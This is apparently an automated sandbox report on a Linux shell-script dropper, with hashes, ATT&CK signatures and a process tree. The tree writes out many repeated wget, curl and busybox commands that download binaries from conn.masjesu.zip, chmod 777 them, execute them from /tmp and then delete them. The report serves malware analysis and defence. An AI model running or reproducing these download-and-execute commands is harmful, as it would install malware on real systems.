Analysis
-
max time kernel
149s -
max time network
66s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
10-11-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
-
Size
10KB
-
MD5
2408085a258a318bc587e649a5e777ad
-
SHA1
7d4f24886ae9a4e5b0a1ee3866a311e53a29506d
-
SHA256
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537
-
SHA512
5f9ddc2e0b28f44731c0d27db88455b7154293933a0aaf1d0096344f618fe40fbd5ff45ef4a56ba2a17d8e77f6de838690f88856fdbaaea0ff16dd63183bb7fa
-
SSDEEP
192:Iw+LtUc+r7f932KtEsj+nmtUc+r7f62KtEsU8:Iw+eHp+nJ18
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 20 IoCs
-
Reads runtime system information
Processes:
description ioc process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 62 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- System Network Configuration Discovery
PID:709 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- System Network Configuration Discovery
PID:735 -
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:736 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:737 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:738
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- System Network Configuration Discovery
PID:739 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- System Network Configuration Discovery
PID:742 -
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:743 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:744 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:745
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:746 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:763 -
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:770 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:771 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:775
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:776 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:786 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:801 -
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:802 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:803 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:804
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:805 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:808 -
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:809 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:810 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:812
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:813 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:836 -
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:843 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:844 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:847
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:848 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:853 -
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:857 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:858 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:859
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:860 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:863 -
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:866
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:867 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:870 -
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:871 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:872 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:873
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- System Network Configuration Discovery
PID:874 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- System Network Configuration Discovery
PID:877 -
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:878 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:879 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:880
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- System Network Configuration Discovery
PID:881 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- System Network Configuration Discovery
PID:884 -
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:885 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:886 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:887
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- System Network Configuration Discovery
PID:888 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- System Network Configuration Discovery
PID:891 -
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:892 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:893 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:894
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- System Network Configuration Discovery
PID:895 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- System Network Configuration Discovery
PID:898 -
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:899 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:900 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:901
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- System Network Configuration Discovery
PID:902 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- System Network Configuration Discovery
PID:905 -
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:906 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:907 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:908
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:909 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:912 -
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:913 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:914 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:915
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:916 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:919 -
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:920 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:921 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:922
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:923 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:926 -
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:927 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:928 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:929
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:930 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:933 -
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:934 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:935 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:936
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:937 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:940 -
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:941 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:942 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:943
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:944 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:947 -
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:948 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:949 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:950
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:951 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:952
Network
MITRE ATT&CK Enterprise v15
Downloads